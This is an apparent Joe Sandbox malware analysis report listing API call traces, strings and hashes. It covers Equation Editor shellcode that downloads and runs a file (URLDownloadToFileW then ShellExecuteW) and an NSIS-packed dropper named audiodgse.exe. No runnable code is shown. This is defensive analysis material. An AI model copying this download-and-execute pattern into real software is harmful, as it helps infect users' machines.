ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03530475
ExitProcess.KERNEL32(00000000), ref: 0353048D

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: e1c00e028d7abc4718b8ca59f0e7e545718e9c2cc18295552816babf3ef35b43
Instruction ID: f00cef73945bf4f10836eac66c1e54f55740cdf1b146c1bf1aede8f7453766a7
Opcode Fuzzy Hash: e1c00e028d7abc4718b8ca59f0e7e545718e9c2cc18295552816babf3ef35b43
Instruction Fuzzy Hash: B341679680D3C12FDB13EB302D6A655BF247F63104F5D89CE94C74A4E3E2989205C767

Uniqueness

Uniqueness Score: -1.00%

Function 035303DA Relevance: 4.6, APIs: 3, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: a91284640ddb484cc1e159123733978af5aff9974feb098c9e5f4e02341bcca2
Instruction ID: a24d948578298ef43d0d00ed053c09677299af4c266555960eca302f8201e690
Opcode Fuzzy Hash: a91284640ddb484cc1e159123733978af5aff9974feb098c9e5f4e02341bcca2
Instruction Fuzzy Hash: 1C21349294C3C22FDB139B301C6AB55BF642F63104F5989CEE4C74E4E3E2A88540C767

Uniqueness

Uniqueness Score: -1.00%

Function 03530435 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,035303EB,?,00000000,00000000), ref: 03530437

Part of subcall function 0353044E: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03530475
Part of subcall function 0353044E: ExitProcess.KERNEL32(00000000), ref: 0353048D

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: e3c0fe2d046e96a1c3e9cd01705f4912736346ae8bedc488223c2bb06292bafa
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: 8BF0276068C3403AEA52E7746C8AF696F24BF93704F14088DB1474F4F3E5D0C600C22A

Uniqueness

Uniqueness Score: -1.00%

Function 03530463 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03530475

Part of subcall function 03530488: ExitProcess.KERNEL32(00000000), ref: 0353048D

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: 1c0f71aac2412c7f681871b371a757328b696e03a8378cfdb6ccedc4c94d225a
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: F3014994A8431221DB30E628A845BBAAB50BB53710FCC8C4BA983070F6D19483C3863A

Uniqueness

Uniqueness Score: -1.00%

Function 0353044E Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: 65744602e661bdc7a0f6d7ccb14483875109863d90565b7dbdd9094b52328317
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 3201492068830131E771E2286C84FAEAB90BB93714F98885AE4530B0F2D2848743C23D

Uniqueness

Uniqueness Score: -1.00%

Function 03530488 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 0353048D

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0353048F Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: 516b4e4f1656728d2c709580eb1414260d604a57b43e2db5760832ebf6ddb1ac
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: 9DD05231202602CFC304EF04EA80E13F37AFFD8210B28C268E0014BB69C330E892CA90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0353030D Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(035302FB), ref: 0353030D

Memory Dump Source

Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 450c007dea0f16e053dc5b21e30fc40f182e6e70ba9728136df8b84d78ea75f8
Instruction ID: ccdb23a1431163f06cc85e3ecbbee51df34222a83e6d0125e68d60d7d4eecac6
Opcode Fuzzy Hash: 450c007dea0f16e053dc5b21e30fc40f182e6e70ba9728136df8b84d78ea75f8
Instruction Fuzzy Hash: 16218C9680E7C45FD712E7302EAA195BF20BE53404B2C85CF85C64F1F3E265960AD397

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: audiodgse.exePID: 2880, Parent PID: 1720COMMON

Execution Graph

Execution Coverage:	21.5%
Dynamic/Decrypted Code Coverage:	14%
Signature Coverage:	17.3%
Total number of Nodes:	1533
Total number of Limit Nodes:	50

Executed Functions

Function 00403235 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040325A
GetVersion.KERNEL32 ref: 00403260
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403293
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032CF
OleInitialize.OLE32(00000000), ref: 004032D6
SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032F2
GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00403307
CharNextA.USER32(00000000), ref: 00403343
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403440
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403451
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040345D
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403471
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403479
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348A
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403492
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034A6

Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?,?,?,004032A8,0000000A), ref: 0040639F

Part of subcall function 004037F7: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000,00000002,75712754), ref: 004038E7
Part of subcall function 004037F7: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Trochidae Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Trochidae Setup: Installing,00000000), ref: 004038FA
Part of subcall function 004037F7: GetFileAttributesA.KERNEL32(Call), ref: 00403905
Part of subcall function 004037F7: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
Part of subcall function 004037F7: RegisterClassA.USER32(00422EA0), ref: 0040398B

Part of subcall function 0040371D: CloseHandle.KERNEL32(00000190), ref: 00403728

OleUninitialize.OLE32 ref: 00403554
ExitProcess.KERNEL32 ref: 00403575
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403692
OpenProcessToken.ADVAPI32(00000000), ref: 00403699
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036B1
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036D0
ExitWindowsEx.USER32(00000002,80040002), ref: 004036F4
ExitProcess.KERNEL32 ref: 00403717

Part of subcall function 004056F6: MessageBoxIndirectA.USER32 ref: 00405751

Strings

1033, xrefs: 004034A1
UXTHEME, xrefs: 00403287, 0040328C, 00403292
", xrefs: 00403368
\Temp, xrefs: 00403457
C:\Users\user\AppData\Local\Temp\, xrefs: 00403435, 0040343A, 00403450, 0040345C, 0040346B, 00403478, 00403484, 0040348C, 00403585, 00403596, 004035A1, 004035AD, 004035BA, 004035C9, 00403678
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 00403531
.tmp, xrefs: 0040359C
~nsu, xrefs: 00403580
NSIS Error, xrefs: 004032F8
TEMP, xrefs: 00403485
Error launching installer, xrefs: 0040350C
C:\Users\user\AppData\Roaming, xrefs: 004035A7, 004035AC, 004035D8
"C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 0040330D, 00403313, 004034CA
C:\Users\user\AppData\Roaming\audiodgse.exe, xrefs: 00403632
TMP, xrefs: 0040348D
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens, xrefs: 00403425, 00403526, 004035D0, 004035D9
Low, xrefs: 00403473
SeShutdownPrivilege, xrefs: 004036AB

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$"C:\Users\user\AppData\Roaming\audiodgse.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers$C:\Users\user\AppData\Roaming\audiodgse.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3776617018-100158310
Opcode ID: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
Instruction ID: 70de6b230954929a2c0fab4aa6e61a8dc1a32ac2bd4530e0982157a086cffda4
Opcode Fuzzy Hash: 47f0f4bfed41ce18027c3f7b4cd283128f530326f184dcc79bdceb26c856a261
Instruction Fuzzy Hash: 62C1F6706086526AE7216F759D49B2F3EA8EB81706F04453FF541B61E2CB7C8E05CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040523F Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040529E
GetDlgItem.USER32(?,000003EE), ref: 004052AD
GetClientRect.USER32 ref: 004052EA
GetSystemMetrics.USER32 ref: 004052F1
SendMessageA.USER32 ref: 00405312
SendMessageA.USER32 ref: 00405323
SendMessageA.USER32 ref: 00405336
SendMessageA.USER32 ref: 00405344
SendMessageA.USER32 ref: 00405357
ShowWindow.USER32(00000000,?), ref: 00405379
ShowWindow.USER32(?,00000008), ref: 0040538D
GetDlgItem.USER32(?,000003EC), ref: 004053AE
SendMessageA.USER32 ref: 004053BE
SendMessageA.USER32 ref: 004053D7
SendMessageA.USER32 ref: 004053E3
GetDlgItem.USER32(?,000003F8), ref: 004052BC

Part of subcall function 0040409D: SendMessageA.USER32 ref: 004040AB

GetDlgItem.USER32(?,000003EC), ref: 004053FF
CreateThread.KERNELBASE(00000000,00000000,Function_000051D3,00000000), ref: 0040540D
CloseHandle.KERNELBASE(00000000), ref: 00405414
ShowWindow.USER32(00000000), ref: 00405437
ShowWindow.USER32(?,00000008), ref: 0040543E
ShowWindow.USER32(00000008), ref: 00405484
SendMessageA.USER32 ref: 004054B8
CreatePopupMenu.USER32 ref: 004054C9
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054DE
GetWindowRect.USER32(?,000000FF), ref: 004054FE
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405517
SendMessageA.USER32 ref: 00405553
OpenClipboard.USER32(00000000), ref: 00405563
EmptyClipboard.USER32 ref: 00405569
GlobalAlloc.KERNEL32(00000042,?), ref: 00405572
GlobalLock.KERNEL32 ref: 0040557C
SendMessageA.USER32 ref: 00405590
GlobalUnlock.KERNEL32(00000000), ref: 004055A9
SetClipboardData.USER32 ref: 004055B4
CloseClipboard.USER32 ref: 004055BA

Strings

Trochidae Setup: Installing, xrefs: 0040552F

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: Trochidae Setup: Installing
API String ID: 590372296-4121273588
Opcode ID: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
Instruction ID: b9a96890980d2d8b9797d0de0d5ce2eab2fec2a682b8a0b11cb6d69254f0e8d6
Opcode Fuzzy Hash: 5e248db37e798cb99e868fa2efa30f8b142e25c36e83f8749ee739c671aa7136
Instruction Fuzzy Hash: C4A15CB1900208BFDB119FA0DD89AAE7FB9FB48355F00403AFA05B61A0C7B55E51DF69

Uniqueness

Uniqueness Score: -1.00%

Function 72BE1A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 72BE1215: GlobalAlloc.KERNELBASE(00000040,72BE1233,?,72BE12CF,-72BE404B,72BE11AB,-000000A0), ref: 72BE121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 72BE1BC4
lstrcpyA.KERNEL32(00000008,?), ref: 72BE1C0C
lstrcpyA.KERNEL32(00000408,?), ref: 72BE1C16
GlobalFree.KERNEL32(00000000), ref: 72BE1C29
GlobalFree.KERNEL32(?), ref: 72BE1D09
GlobalFree.KERNEL32(?), ref: 72BE1D0E
GlobalFree.KERNEL32(?), ref: 72BE1D13
GlobalFree.KERNEL32(00000000), ref: 72BE1EFA
lstrcpyA.KERNEL32(?,?), ref: 72BE2098
GetModuleHandleA.KERNEL32(00000008), ref: 72BE2114
LoadLibraryA.KERNEL32(00000008), ref: 72BE2125
GetProcAddress.KERNEL32(?,?), ref: 72BE217E
lstrlenA.KERNEL32(00000408), ref: 72BE2198

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 08684463e5a4f44f53ad76b025a75244e0fbb793c4e47ff614150fffb5089be8
Instruction ID: ca1ae589501bc9a0af2804c439660dd81e281ed9eb8c8c9baf288abbbd3e5850
Opcode Fuzzy Hash: 08684463e5a4f44f53ad76b025a75244e0fbb793c4e47ff614150fffb5089be8
Instruction Fuzzy Hash: CD228EB1D24209DFDB118FACC8807ADBBF5FB84305F2095AED197E6284E7745A81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004057A2 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057CB
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405813
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040583A
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040584B
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058F8
FindClose.KERNEL32(00000000), ref: 00405909

Strings

"C:\Users\user\AppData\Roaming\audiodgse.exe" , xrefs: 004057A2
C:\Users\user\AppData\Local\Temp\, xrefs: 004057AF
\*.*, xrefs: 0040580D

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\AppData\Roaming\audiodgse.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1373421629
Opcode ID: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
Instruction ID: d5f8e1a5a2f38c4268bcbec4acbb3c578bb2518a62eabdffbc14051f19ad4651
Opcode Fuzzy Hash: 9534ed492e479d78e2508825cc8aff22a23d0aad2da830bd7208bf437f0dd8c3
Instruction Fuzzy Hash: F251E171900A18BADB21BB228C45BAF7A79DF42724F14807BF841B51D2D77C8942DEAD

Uniqueness

Uniqueness Score: -1.00%

Function 00406666 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
Instruction ID: 4f714145f5a313d6319dbd2ae6a602097e3dd159542c3e152d0bb7460fb66c8d
Opcode Fuzzy Hash: b42b921e85d89c0e117f5f9f4e0d0c16e752254418a7148ec341c06b29f841c9
Instruction Fuzzy Hash: 25F17571D00229CBDF28CFA8C8946ADBBB0FF44305F25856ED856BB281D7395A96CF44

Uniqueness

Uniqueness Score: -1.00%

Function 004062DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(?,00421558,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00405AA3,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,T'qu,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 004062E8
FindClose.KERNEL32(00000000), ref: 004062F4

Strings

C:\Users\user\AppData\Local\Temp\nsfF9C.tmp, xrefs: 004062DD

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp
API String ID: 2295610775-4240112750
Opcode ID: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
Instruction ID: 9f0851c2fc9ceccd35e24d87c19841e9ead441a619ffea6187f1505ec1ede2b7
Opcode Fuzzy Hash: 78efce08eb58f860d58d9cc4337d862744689776f4b13788d4bc070c197dd51e
Instruction Fuzzy Hash: B1D012319090207BC30117386E0C85B7A599B553317228A77F967F12F0C7388C7696E9

Uniqueness

Uniqueness Score: -1.00%

Function 00403B94 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BD0
ShowWindow.USER32(?), ref: 00403BED
DestroyWindow.USER32 ref: 00403C01
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C1D
GetDlgItem.USER32(?,?), ref: 00403C3E
SendMessageA.USER32 ref: 00403C52
IsWindowEnabled.USER32(00000000), ref: 00403C59
GetDlgItem.USER32(?,00000001), ref: 00403D07
GetDlgItem.USER32(?,00000002), ref: 00403D11
SetClassLongA.USER32(?,000000F2,?), ref: 00403D2B
SendMessageA.USER32 ref: 00403D7C
GetDlgItem.USER32(?,00000003), ref: 00403E22
ShowWindow.USER32(00000000,?), ref: 00403E43
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E55
EnableWindow.USER32(?,?), ref: 00403E70
GetSystemMenu.USER32 ref: 00403E86
EnableMenuItem.USER32 ref: 00403E8D
SendMessageA.USER32 ref: 00403EA5
